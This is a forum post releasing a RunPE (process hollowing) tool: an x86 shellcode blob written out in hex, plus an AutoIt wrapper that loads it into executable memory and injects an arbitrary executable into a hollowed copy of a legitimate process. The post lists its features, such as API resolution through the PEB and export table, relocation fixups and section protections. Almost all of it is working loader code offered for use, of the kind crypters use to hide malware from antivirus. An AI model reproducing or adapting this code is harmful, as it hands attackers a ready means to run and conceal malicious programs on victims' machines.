Wardow escribió: Hello!
I'm here to release a RunPE Shellcode I have made.
Informations:
Gets Kernel32 and Ntdll modules addresses from PEB
Resolves needed functions pointers by walking on the EAT
Is able to apply fixups
Supports Unicode
Does apply proper section memory protection flags
Will technically never fail when the file has a relocation table (fixups)
You can pass custom arguments, program to hollow
Should be the most stable possible
There should not be any memory leak
Call chain:
ntdll!RtlZeroMemory, CreateProcessW, GetThreadContext, ReadProcessMemory, NtUnmapViewOfSection, VirtualAlloc, VirtualAllocEx, ntdll!memcpy, WriteProcessMemory, VirtualProtectEx, SetThreadContext, ResumeThread
#cs ----------------------------------------------------------------------------
AutoIt Version: 3+
Author: Wardow
Script Function:
x86 RunPE Shellcode wrapper.
#ce ----------------------------------------------------------------------------
$ProcessId = RunPE(@AutoItExe, "", FileRead("Application.exe"))
MsgBox(64, "RunPE has been executed", "ProcessId: " & $ProcessId)
Func RunPE($wPath, $wArguments, $lpFile)
Local $Bin_Shellcode = "0x558BEC8B4D088BC18039007406408038"
$Bin_Shellcode &= "0075FA2BC15DC20400558BEC56578B7D"
$Bin_Shellcode &= "0833F657E8D7FFFFFF8BC885C974200F"
$Bin_Shellcode &= "BE07C1E60403F08BC625000000F0740B"
$Bin_Shellcode &= "C1E81833F081E6FFFFFF0F474975E05F"
$Bin_Shellcode &= "8BC65E5DC20400558BEC51515356578B"
$Bin_Shellcode &= "7D0833F68B473C8B44387803C78B5020"
$Bin_Shellcode &= "8B581C03D78B482403DF8B401803CF89"
$Bin_Shellcode &= "55FC894DF889450885C074198B04B203"
$Bin_Shellcode &= "C750E882FFFFFF3B450C74148B55FC46"
$Bin_Shellcode &= "3B750872E733C05F5E5B8BE55DC20800"
$Bin_Shellcode &= "8B45F80FB704708B048303C7EBE9558B"
$Bin_Shellcode &= "EC8B4D0833D28BC1663911740883C002"
$Bin_Shellcode &= "66391075F82BC183E0FE5DC20400558B"
$Bin_Shellcode &= "EC5356578B7D0885FF74578B5D0C85DB"
$Bin_Shellcode &= "745057E8C6FFFFFF538BF0E8BEFFFFFF"
$Bin_Shellcode &= "3BF0753E2BDFC74508610000000FB70F"
$Bin_Shellcode &= "8BD10FB7343B8BC6663B4D08720681C2"
$Bin_Shellcode &= "E0FF0000663B7508720505E0FF000066"
$Bin_Shellcode &= "3BD0750E6685C9740583C702EBCF33C0"
$Bin_Shellcode &= "EB0333C0405F5E5B5DC20800558BEC64"
$Bin_Shellcode &= "A13000000056578B400C8B780C8BF7FF"
$Bin_Shellcode &= "7508FF7630E874FFFFFF85C0740A8B36"
$Bin_Shellcode &= "3BF775EB33C0EB038B46185F5E5DC204"
$Bin_Shellcode &= "00558BEC81EC24040000837D08005356"
$Bin_Shellcode &= "570F84DC050000837D10000F84D20500"
$Bin_Shellcode &= "006A6B586A65596A7266894588586A6E"
$Bin_Shellcode &= "5E6A6C5F6A336689458C586A32668945"
$Bin_Shellcode &= "94586A2E5A6A646689459633C066894D"
$Bin_Shellcode &= "8A66894D9059668945A06A7458668945"
$Bin_Shellcode &= "A633C0668945B68D45A4506689758E66"
$Bin_Shellcode &= "897D926689559866894D9A66897D9C66"
$Bin_Shellcode &= "897D9E668975A466894DA866897DAA66"
$Bin_Shellcode &= "897DAC668955AE66894DB066897DB266"
$Bin_Shellcode &= "897DB4E824FFFFFF8BF88D458850E819"
$Bin_Shellcode &= "FFFFFF8BD8C78528FFFFFF793A3C078D"
$Bin_Shellcode &= "45C4C7852CFFFFFF794A8A0B8985ECFE"
$Bin_Shellcode &= "FFFF8D45D88985F0FEFFFF8D45B88985"
$Bin_Shellcode &= "F4FEFFFF8D45848985F8FEFFFF8D45DC"
$Bin_Shellcode &= "8985FCFEFFFF8D8574FFFFFF898500FF"
$Bin_Shellcode &= "FFFF8D45D0C78530FFFFFFEE38830CC7"
$Bin_Shellcode &= "8534FFFFFF5764E101C78538FFFFFF18"
$Bin_Shellcode &= "E4CA08C7853CFFFFFFE3CAD803C78540"
$Bin_Shellcode &= "FFFFFF99B04806C78544FFFFFF93BA94"
$Bin_Shellcode &= "03C78548FFFFFFE4C7B904C7854CFFFF"
$Bin_Shellcode &= "FFE487B804C78550FFFFFFA92DD701C7"
$Bin_Shellcode &= "8554FFFFFF05D13D0BC78558FFFFFF44"
$Bin_Shellcode &= "27230FC7855CFFFFFFE86F180DC78560"
$Bin_Shellcode &= "FFFFFFB57DAE09898504FFFFFF8D8570"
$Bin_Shellcode &= "FFFFFF898508FFFFFF8D458089850CFF"
$Bin_Shellcode &= "FFFF8D8578FFFFFF898510FFFFFF8D85"
$Bin_Shellcode &= "7CFFFFFF898514FFFFFF8D45C0898518"
$Bin_Shellcode &= "FFFFFF8D856CFFFFFF89851CFFFFFF8D"
$Bin_Shellcode &= "45BC898520FFFFFF8D45E0898524FFFF"
$Bin_Shellcode &= "FF33C08BF0FFB4B528FFFFFF83FE028B"
$Bin_Shellcode &= "C70F4FC350E8DDFCFFFF8B8CB5ECFEFF"
$Bin_Shellcode &= "FF890185C00F84E80300004683FE0F7C"
$Bin_Shellcode &= "D433C040898564FFFFFF8D45E46A1050"
$Bin_Shellcode &= "FF55D86A448D85A8FEFFFF50FF55D868"
$Bin_Shellcode &= "CC0200008D85DCFBFFFFC785A8FEFFFF"
$Bin_Shellcode &= "4400000050FF55D88B4D1033D2C785DC"
$Bin_Shellcode &= "FBFFFF070001008BFA8B713C03F10FB7"
$Bin_Shellcode &= "46148955FC8955CC8945C83996A00000"
$Bin_Shellcode &= "0074163996A4000000740EF646160175"
$Bin_Shellcode &= "0833DB43895DF8EB058BDA8955F833C0"
$Bin_Shellcode &= "8955D46639110F94C03D4D5A00000F84"
$Bin_Shellcode &= "4F03000033C039160F94C03D50450000"
$Bin_Shellcode &= "0F843D03000033C0663956040F94C03D"
$Bin_Shellcode &= "4C0100000F84290300008D45E4508D85"
$Bin_Shellcode &= "A8FEFFFF5052526A04525252FF750CFF"
$Bin_Shellcode &= "7508FF558485C00F84C50200008D85DC"
$Bin_Shellcode &= "FBFFFF50FF75E8FF558085C00F84B002"
$Bin_Shellcode &= "000033C0506A048D45CC508B8580FCFF"
$Bin_Shellcode &= "FF83C00850FF75E4FF957CFFFFFF85C0"
$Bin_Shellcode &= "0F848C0200008B45CC3B4634750F50FF"
$Bin_Shellcode &= "75E4FF55B885C00F85750200006A4068"
$Bin_Shellcode &= "00300000FF765033C050FF9574FFFFFF"
$Bin_Shellcode &= "8BF885FF0F84580200006A4068003000"
$Bin_Shellcode &= "00FF7650FF7634FF75E4FF55DC8945FC"
$Bin_Shellcode &= "85C0754185DB7518FF7634FF75E4FF55"
$Bin_Shellcode &= "B86A406800300000FF7650FF7634EB14"
$Bin_Shellcode &= "6A406800300000FF765033C0C745D401"
$Bin_Shellcode &= "00000050FF75E4FF55DC8945FC85C00F"
$Bin_Shellcode &= "84FD010000FF7654FF751057FF55C433"
$Bin_Shellcode &= "C933C0894DF4663B4606732E8B5DC883"
$Bin_Shellcode &= "C32C03DEFF73FC8B03034510508B43F8"
$Bin_Shellcode &= "03C750FF55C48B4DF48D5B280FB74606"
$Bin_Shellcode &= "41894DF43BC87CDC33C98B5F3C8B45FC"
$Bin_Shellcode &= "03DF837DD4008943340F848100000083"
$Bin_Shellcode &= "7DF800747B8B93A000000003D7894DF8"
$Bin_Shellcode &= "398BA400000076688B420483E808894D"
$Bin_Shellcode &= "F4A9FEFFFFFF76410FB74C4A086685C9"
$Bin_Shellcode &= "74248B463481E1FF0F0000030A290439"
$Bin_Shellcode &= "8B45F40FB74C42088B433481E1FF0F00"
$Bin_Shellcode &= "00030A0104398B42048B4DF483E80841"
$Bin_Shellcode &= "D1E8894DF43BC872BF8B4DF8034A0403"
$Bin_Shellcode &= "52043B8BA40000006A00894DF8597298"
$Bin_Shellcode &= "33DB53FF765057FF75FCFF75E4FF55D0"
$Bin_Shellcode &= "85C00F840C0100008D8568FFFFFF506A"
$Bin_Shellcode &= "02FF7654FF75FCFF75E4FF55BC85C00F"
$Bin_Shellcode &= "84EF00000033C0895DF8663B4606736F"
$Bin_Shellcode &= "8B5DC883C33C03DE8B03A90000002074"
$Bin_Shellcode &= "1985C079046A40EB172500000040F7D8"
$Bin_Shellcode &= "1BC083E01083C010EB1585C079056A04"
$Bin_Shellcode &= "58EB0CA9000000406A00580F95C0408D"
$Bin_Shellcode &= "8D68FFFFFF5150FF73E48B43E80345FC"
$Bin_Shellcode &= "50FF75E4FF55BC85C074128B4DF883C3"
$Bin_Shellcode &= "280FB7460641894DF83BC8729B33DB68"
$Bin_Shellcode &= "008000005357FF55C085C07467536A04"
$Bin_Shellcode &= "8D45FC508B8580FCFFFF83C00850FF75"
$Bin_Shellcode &= "E4FF55D085C0744C8B46280345FC8985"
$Bin_Shellcode &= "8CFCFFFF8D85DCFBFFFF50FF75E8FF95"
$Bin_Shellcode &= "78FFFFFF85C0742CFF75E8FF956CFFFF"
$Bin_Shellcode &= "FF85C0741F837DE4007406FF75E4FF55"
$Bin_Shellcode &= "E0837DE8007406FF75E8FF55E08B45EC"
$Bin_Shellcode &= "EB4333DB837DE400741053FF75E4FF95"
$Bin_Shellcode &= "70FFFFFFFF75E4FF55E0837DE8007406"
$Bin_Shellcode &= "FF75E8FF55E085FF740A680080000053"
$Bin_Shellcode &= "57FF55C08B8564FFFFFF83F8050F8620"
$Bin_Shellcode &= "FCFFFF33C05F5E5B8BE55DC20C00"
Local $lpShellcode = DllCall("kernel32", "ptr", "VirtualAlloc", "dword", 0, "dword", BinaryLen($Bin_Shellcode), "dword", 0x3000, "dword", 0x40)
If Not @error And $lpShellcode[0] Then
$lpShellcode = $lpShellcode[0]
Else
Return False
EndIf
Local $Shellcode_Struct = DllStructCreate("byte shellcode[" & BinaryLen($Bin_Shellcode) & "]", $lpShellcode)
Local $File_Struct = DllStructCreate("byte lpfile[" & StringLen($lpFile) & "]")
DllStructSetData($Shellcode_Struct, "shellcode", $Bin_Shellcode)
DllStructSetData($File_Struct, "lpfile", $lpFile)
Local $Ret = DllCallAddress("dword", $lpShellcode + 0x181, "wstr", $wPath, "wstr", $wArguments, "ptr", DllStructGetPtr($File_Struct))
DllCall("kernel32", "dword", "VirtualFree", "dword", $lpShellcode, "dword", 0, "dword", 0x8000)
If Not @error And $Ret[0] Then
Return $Ret[0]
Else
Return False
EndIf
EndFunc
//Regards.